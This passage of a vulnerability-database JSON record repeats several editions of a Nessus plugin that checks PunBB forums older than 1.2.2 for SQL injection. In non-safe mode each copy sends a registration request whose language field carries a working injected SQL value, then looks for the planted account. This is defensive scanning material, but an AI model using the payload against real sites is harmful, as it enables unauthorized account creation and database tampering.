registering\\n\",\n \"**** the user \", user, \" to PunBB on the remote host;\\n\",\n \"**** you may wish to remove it at your convenience.\\n\"\n );\n security_hole(port:port, extra: rep);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n}\n", "title": "PunBB < 1.2.2 Multiple Input Validation Vulnerabilities", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-07-30T14:01:43"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2005-0570", "CVE-2005-0571", "CVE-2005-0569"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host is running a version of PunBB that fails to properly sanitize user-input to several scripts thereby enabling an attacker to launch various SQL injection attacks. \n\nIn addition, the profile.php script enables anyone to call the change_pass action while specifying the id of an existing user to set their password to NULL, effectively shutting them out of the system.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "3b746f91768f411c8b7bf9546e22ac45ceeb1befb10c001a5941ec0fd04ee135", "hashmap": [{"hash": "8825cfcc6a68eb22807158b2fdce98f8", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "26ad0cb788d040b30773b34abb68726b", "key": "href"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "5daaef6bf6c9f391360809e0473e4c11", "key": "title"}, {"hash": "57571165e0e6b3638078a5722a5ad8b0", "key": "published"}, {"hash": "d32c4adc3c3710247652ad4ec2f0a3ee", "key": "cvelist"}, {"hash": "6d07909b751422fd12fe13f9af53fb32", "key": "sourceData"}, {"hash": "6878789b51b9889de378c332ee256e56", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "d8e786d674ada58984bf0a2e32807381", "key": "pluginID"}, {"hash": "fa81631e91e8630740ed0c17ac5690c4", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=17224", "id": "PUNBB_INPUT_VALIDATION_VULNS.NASL", "lastseen": "2018-09-01T23:51:26", "modified": "2018-07-25T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "17224", "published": "2005-02-26T00:00:00", "references": ["http://marc.info/?l=bugtraq&m=110927754230666&w=2", "http://forums.punbb.org/viewtopic.php?id=6460"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(17224);\n script_version(\"1.21\");\n\n script_cve_id(\"CVE-2005-0569\", \"CVE-2005-0570\", \"CVE-2005-0571\");\n script_bugtraq_id(12652);\n\n script_name(english:\"PunBB < 1.2.2 Multiple Input Validation Vulnerabilities\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that suffers from\nmultiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of PunBB that fails to properly\nsanitize user-input to several scripts thereby enabling an attacker to\nlaunch various SQL injection attacks. \n\nIn addition, the profile.php script enables anyone to call the\nchange_pass action while specifying the id of an existing user to set\ntheir password to NULL, effectively shutting them out of the system.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=110927754230666&w=2\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://forums.punbb.org/viewtopic.php?id=6460\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PunBB 1.2.2 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/02/26\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/02/24\");\n script_cvs_date(\"Date: 2018/07/25 18:58:03\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n summary[\"english\"] = \"Detects input validation vulnerabilities in PunBB\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_MIXED_ATTACK);\n \n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"punBB_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/punBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/punBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n ver = matches[1];\n dir = matches[2];\n\n # If safe_checks are enabled, rely on the version number alone.\n if (safe_checks()) {\n if (\n # Either the version is 1.1.x - 1.2.1 or\n ereg(pattern:\"^1\\.(1|2$|2\\.1([^0-9]|$))\", string:ver) ||\n # the version is unknown and report paranoia is Paranoid.\n (\"unknown\" >< ver && report_paranoia == 2)\n ) {\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n # Otherwise, try to exploit it.\n else {\n # Specify a user / password to register. gettimeofday() serves\n # to avoid conflicts and have a (somewhat) random password.\n now = split(gettimeofday(), sep:\".\", keep:0);\n user = string(\"nessus\", now[0]);\n pass = now[1];\n\n # Try to create a new user.\n url = \"/register.php?action=register\";\n bound = \"bound\";\n boundary = string(\"--\", bound);\n postdata = string(\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"form_sent\"', \"\\r\\n\",\n \"\\r\\n\",\n \"1\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_username\"', \"\\r\\n\",\n \"\\r\\n\",\n user, \"\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_password1\"', \"\\r\\n\",\n \"\\r\\n\",\n \"whatever\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_password2\"', \"\\r\\n\",\n \"\\r\\n\",\n \"whatever\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_email1\"', \"\\r\\n\",\n \"\\r\\n\",\n user, \"@example.com\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"language\"', \"\\r\\n\",\n \"\\r\\n\",\n # nb: we're supplying values for language, style, registered, \n # registration_ip, and last_visit. A value of 0 for\n # 'registered' implies the user registered in 12/31/1969,\n # which is the basis for our check below.\n \"English','Oxygen',0,'0.0.0.0',0) -- \\r\\n\",\n\n boundary, \"--\", \"\\r\\n\"\n );\n\n r = http_send_recv3(method: \"POST\", item: dir + url, port: port,\n content_type: \"multipart/form-data; boundary=\"+bound );\n if (isnull(r)) exit(0, \"The web server did not answer\");\n res = r[2];\n\n # Now check the User List for the user we just created.\n r = http_send_recv3(method:\"GET\", port:port,\n item:string(dir, \"/userlist.php?username=\", user, \"&show_group=-1&sort_by=username&sort_dir=ASC&search=Submit\") );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # If they registered in 1969, there's a problem.\n if (egrep(pattern:'class=\"tcr\">.*1969.*</td>', string:res)) {\n rep = string(\n \"**** Nessus has successfully exploited this vulnerability by registering\\n\",\n \"**** the user \", user, \" to PunBB on the remote host;\\n\",\n \"**** you may wish to remove it at your convenience.\\n\"\n );\n security_hole(port:port, extra: rep);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n}\n", "title": "PunBB < 1.2.2 Multiple Input Validation Vulnerabilities", "type": "nessus", "viewCount": 1}, "differentElements": ["references", "modified", "sourceData"], "edition": 4, "lastseen": "2018-09-01T23:51:26"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2005-0570", "CVE-2005-0571", "CVE-2005-0569"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host is running a version of PunBB that fails to properly sanitize user-input to several scripts thereby enabling an attacker to launch various SQL injection attacks. \n\nIn addition, the profile.php script enables anyone to call the change_pass action while specifying the id of an existing user to set their password to NULL, effectively shutting them out of the system.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "ccf9759d5cb38daaaf0977a8898d541baef327ffdbc3a81b118c247cfcecc0fd", "hashmap": [{"hash": "e705e5b430679d57f79851fa64d8c107", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "26ad0cb788d040b30773b34abb68726b", "key": "href"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "5daaef6bf6c9f391360809e0473e4c11", "key": "title"}, {"hash": "57571165e0e6b3638078a5722a5ad8b0", "key": "published"}, {"hash": "d32c4adc3c3710247652ad4ec2f0a3ee", "key": "cvelist"}, {"hash": "fbe77825a281ca4eaf667927b4e681a5", "key": "sourceData"}, {"hash": "6878789b51b9889de378c332ee256e56", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "d8e786d674ada58984bf0a2e32807381", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=17224", "id": "PUNBB_INPUT_VALIDATION_VULNS.NASL", "lastseen": "2018-11-17T03:04:13", "modified": "2018-11-15T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "17224", "published": "2005-02-26T00:00:00", "references": ["https://marc.info/?l=bugtraq&m=110927754230666&w=2", "http://forums.punbb.org/viewtopic.php?id=6460"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(17224);\n script_version(\"1.22\");\n\n script_cve_id(\"CVE-2005-0569\", \"CVE-2005-0570\", \"CVE-2005-0571\");\n script_bugtraq_id(12652);\n\n script_name(english:\"PunBB < 1.2.2 Multiple Input Validation Vulnerabilities\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that suffers from\nmultiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of PunBB that fails to properly\nsanitize user-input to several scripts thereby enabling an attacker to\nlaunch various SQL injection attacks. \n\nIn addition, the profile.php script enables anyone to call the\nchange_pass action while specifying the id of an existing user to set\ntheir password to NULL, effectively shutting them out of the system.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://marc.info/?l=bugtraq&m=110927754230666&w=2\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://forums.punbb.org/viewtopic.php?id=6460\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PunBB 1.2.2 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/02/26\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/02/24\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n summary[\"english\"] = \"Detects input validation vulnerabilities in PunBB\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_MIXED_ATTACK);\n \n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"punBB_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/punBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/punBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n ver = matches[1];\n dir = matches[2];\n\n # If safe_checks are enabled, rely on the version number alone.\n if (safe_checks()) {\n if (\n # Either the version is 1.1.x - 1.2.1 or\n ereg(pattern:\"^1\\.(1|2$|2\\.1([^0-9]|$))\", string:ver) ||\n # the version is unknown and report paranoia is Paranoid.\n (\"unknown\" >< ver && report_paranoia == 2)\n ) {\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n # Otherwise, try to exploit it.\n else {\n # Specify a user / password to register. gettimeofday() serves\n # to avoid conflicts and have a (somewhat) random password.\n now = split(gettimeofday(), sep:\".\", keep:0);\n user = string(\"nessus\", now[0]);\n pass = now[1];\n\n # Try to create a new user.\n url = \"/register.php?action=register\";\n bound = \"bound\";\n boundary = string(\"--\", bound);\n postdata = string(\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"form_sent\"', \"\\r\\n\",\n \"\\r\\n\",\n \"1\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_username\"', \"\\r\\n\",\n \"\\r\\n\",\n user, \"\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_password1\"', \"\\r\\n\",\n \"\\r\\n\",\n \"whatever\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_password2\"', \"\\r\\n\",\n \"\\r\\n\",\n \"whatever\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_email1\"', \"\\r\\n\",\n \"\\r\\n\",\n user, \"@example.com\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"language\"', \"\\r\\n\",\n \"\\r\\n\",\n # nb: we're supplying values for language, style, registered, \n # registration_ip, and last_visit. A value of 0 for\n # 'registered' implies the user registered in 12/31/1969,\n # which is the basis for our check below.\n \"English','Oxygen',0,'0.0.0.0',0) -- \\r\\n\",\n\n boundary, \"--\", \"\\r\\n\"\n );\n\n r = http_send_recv3(method: \"POST\", item: dir + url, port: port,\n content_type: \"multipart/form-data; boundary=\"+bound );\n if (isnull(r)) exit(0, \"The web server did not answer\");\n res = r[2];\n\n # Now check the User List for the user we just created.\n r = http_send_recv3(method:\"GET\", port:port,\n item:string(dir, \"/userlist.php?username=\", user, \"&show_group=-1&sort_by=username&sort_dir=ASC&search=Submit\") );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # If they registered in 1969, there's a problem.\n if (egrep(pattern:'class=\"tcr\">.*1969.*</td>', string:res)) {\n rep = string(\n \"**** Nessus has successfully exploited this vulnerability by registering\\n\",\n \"**** the user \", user, \" to PunBB on the remote host;\\n\",\n \"**** you may wish to remove it at your convenience.\\n\"\n );\n security_hole(port:port, extra: rep);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n}\n", "title": "PunBB < 1.2.2 Multiple Input Validation Vulnerabilities", "type": "nessus", "viewCount": 2}, "differentElements": ["description"], "edition": 5, "lastseen": "2018-11-17T03:04:13"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2005-0570", "CVE-2005-0571", "CVE-2005-0569"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host is running a version of PunBB that fails to properly\nsanitize user-input to several scripts thereby enabling an attacker to\nlaunch various SQL injection attacks. \n\nIn addition, the profile.php script enables anyone to call the\nchange_pass action while specifying the id of an existing user to set\ntheir password to NULL, effectively shutting them out of the system.", "edition": 6, "enchantments": {"dependencies": {"modified": "2019-01-16T20:05:58", "references": [{"idList": ["CVE-2005-0570", "CVE-2005-0571", "CVE-2005-0569"], "type": "cve"}, {"idList": ["OSVDB:14128", "OSVDB:14130", "OSVDB:14129", "OSVDB:14132", "OSVDB:14131"], "type": "osvdb"}, {"idList": ["EDB-ID:25160"], "type": "exploitdb"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "22a1ac99ce7859e93b5d6a01d664a61d9229e40fa8d8249f042bce5aeabf36a9", "hashmap": [{"hash": "e705e5b430679d57f79851fa64d8c107", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "26ad0cb788d040b30773b34abb68726b", "key": "href"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "5daaef6bf6c9f391360809e0473e4c11", "key": "title"}, {"hash": "57571165e0e6b3638078a5722a5ad8b0", "key": "published"}, {"hash": "d32c4adc3c3710247652ad4ec2f0a3ee", "key": "cvelist"}, {"hash": "fbe77825a281ca4eaf667927b4e681a5", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "d8e786d674ada58984bf0a2e32807381", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "bb29204bc8beb9436f74dcc190efa50f", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=17224", "id": "PUNBB_INPUT_VALIDATION_VULNS.NASL", "lastseen": "2019-01-16T20:05:58", "modified": "2018-11-15T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "17224", "published": "2005-02-26T00:00:00", "references": ["https://marc.info/?l=bugtraq&m=110927754230666&w=2", "http://forums.punbb.org/viewtopic.php?id=6460"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(17224);\n script_version(\"1.22\");\n\n script_cve_id(\"CVE-2005-0569\", \"CVE-2005-0570\", \"CVE-2005-0571\");\n script_bugtraq_id(12652);\n\n script_name(english:\"PunBB < 1.2.2 Multiple Input Validation Vulnerabilities\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that suffers from\nmultiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of PunBB that fails to properly\nsanitize user-input to several scripts thereby enabling an attacker to\nlaunch various SQL injection attacks. \n\nIn addition, the profile.php script enables anyone to call the\nchange_pass action while specifying the id of an existing user to set\ntheir password to NULL, effectively shutting them out of the system.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://marc.info/?l=bugtraq&m=110927754230666&w=2\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://forums.punbb.org/viewtopic.php?id=6460\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PunBB 1.2.2 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/02/26\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/02/24\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n summary[\"english\"] = \"Detects input validation vulnerabilities in PunBB\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_MIXED_ATTACK);\n \n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"punBB_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/punBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/punBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n ver = matches[1];\n dir = matches[2];\n\n # If safe_checks are enabled, rely on the version number alone.\n if (safe_checks()) {\n if (\n # Either the version is 1.1.x - 1.2.1 or\n ereg(pattern:\"^1\\.(1|2$|2\\.1([^0-9]|$))\", string:ver) ||\n # the version is unknown and report paranoia is Paranoid.\n (\"unknown\" >< ver && report_paranoia == 2)\n ) {\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n # Otherwise, try to exploit it.\n else {\n # Specify a user / password to register. gettimeofday() serves\n # to avoid conflicts and have a (somewhat) random password.\n now = split(gettimeofday(), sep:\".\", keep:0);\n user = string(\"nessus\", now[0]);\n pass = now[1];\n\n # Try to create a new user.\n url = \"/register.php?action=register\";\n bound = \"bound\";\n boundary = string(\"--\", bound);\n postdata = string(\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"form_sent\"', \"\\r\\n\",\n \"\\r\\n\",\n \"1\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_username\"', \"\\r\\n\",\n \"\\r\\n\",\n user, \"\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_password1\"', \"\\r\\n\",\n \"\\r\\n\",\n \"whatever\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_password2\"', \"\\r\\n\",\n \"\\r\\n\",\n \"whatever\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"req_email1\"', \"\\r\\n\",\n \"\\r\\n\",\n user, \"@example.com\\r\\n\",\n\n boundary, \"\\r\\n\", \n 'Content-Disposition: form-data; name=\"language\"', \"\\r\\n\",\n \"\\r\\n\",\n # nb: we're supplying values for language, style, registered, \n # registration_ip, and last_visit. A value of 0 for\n # 'registered' implies the user registered in 12/31/1969,\n # which is the basis for our check below.\n \"English','Oxygen',0,'0.0.0.0',0) -- \\r\\n\",\n\n boundary, \"--\", \"\\r\\n\"\n );\n\n r = http_send_recv3(method: \"POST\", item: dir + url, port: port,\n content_type: \"multipart/form-data; boundary=\"+bound );\n if (isnull(r)) exit(0, \"The web server did not answer\");\n res = r[2];\n\n # Now check the User List for the user we just created.\n r = http_send_recv3(method:\"GET\", port:port,\n item:string(dir, \"/userlist.php?username=\", user, \"&show_group=-1&sort_by=username&sort_dir=ASC&search=Submit\") );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # If they registered in 1969, there's a problem.\n if (egrep(pattern:'class=\"tcr\">.*1969.*</td>', string:res)) {\n rep = string(\n \"**** Nessus has successfully exploited this vulnerability by registering\\n\",\n \"**** the user \", user, \" to PunBB on the remote host;\\n\",\n \"**** you may wish to remove it at your convenience.\\n\"\n );\n security_hole(port:port, extra: rep);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n}\n", "title": "PunBB < 1.2.2 Multiple Input Validation Vulnerabilities", "type": "nessus", "viewCount": 2}, "differentElements": ["description"], "edition": 6, "lastseen": "2019-01-16T20:05:58"}], "edition": 7, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvelist", "hash": "d32c4adc3c3710247652ad4ec2f0a3ee"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "6878789b51b9889de378c332ee256e56"}, {"key": "href", "hash": "26ad0cb788d040b30773b34abb68726b"}, {"key": "modified", "hash": "015cb78ce50d3bd4e2fbe18f25603329"}, {"key": "naslFamily", "hash": "07948b8ff59e8dda0b01012f70f00327"}, {"key": "pluginID", "hash": "d8e786d674ada58984bf0a2e32807381"}, {"key": "published", "hash": "57571165e0e6b3638078a5722a5ad8b0"}, {"key": "references", "hash": "e705e5b430679d57f79851fa64d8c107"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "fbe77825a281ca4eaf667927b4e681a5"}, {"key": "title", "hash": "5daaef6bf6c9f391360809e0473e4c11"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "ccf9759d5cb38daaaf0977a8898d541baef327ffdbc3a81b118c247cfcecc0fd", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-0570", "CVE-2005-0571", "CVE-2005-0569"]}, {"type": "osvdb", "idList": ["OSVDB:14129", "OSVDB:14132", "OSVDB:14131", "OSVDB:14128", "OSVDB:14130"]}, {"type": "exploitdb", "idList": ["EDB-ID:25160"]}], "modified": "2019-02-21T01:08:25"}, "score": {"value": 6.4, "vector": "NONE", "modified": "2019-02-21T01:08:25"}, "vulnersScore": 6.4}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(17224);\n script_version(\"1.22\");\n\n script_cve_id(\"CVE-2005-0569\", \"CVE-2005-0570\", \"CVE-2005-0571\");\n script_bugtraq_id(12652);\n\n script_name(english:\"PunBB < 1.2.2 Multiple Input Validation Vulnerabilities\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that suffers from\nmultiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of PunBB that fails to properly\nsanitize user-input to several scripts thereby enabling an attacker to\nlaunch various SQL injection attacks. \n\nIn addition, the profile.php script enables anyone to call the\nchange_pass action while specifying the id of an existing user to set\ntheir password to NULL, effectively shutting them out of the system.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://marc.info/?l=bugtraq&m=110927754230666&w=2\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://forums.punbb.org/viewtopic.php?id=6460\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PunBB 1.2.2 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/02/26\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/02/24\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n summary[\"english\"] = \"Detects input validation vulnerabilities in PunBB\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_MIXED_ATTACK);\n \n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"punBB_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/punBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/punBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n ver = matches[1];\n dir = matches[2];\n\n # If safe_checks are enabled, rely on the version number alone.\n if (safe_checks()) {\n if (\n # Either the version is 1.1.x - 1.2.1 or\n ereg(pattern:\"^1\\.(1|2$|2\\.1([^0-9]|$))\", string:ver) ||\n # the version is unknown and report paranoia is Paranoid.\n (\"unknown\" >< ver && report_paranoia == 2)\n ) {\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n # Otherwise, try to exploit it.\n else {\n # Specify a user / password to register. gettimeofday() serves\n # to avoid conflicts and have a (somewhat) random password.\n now = 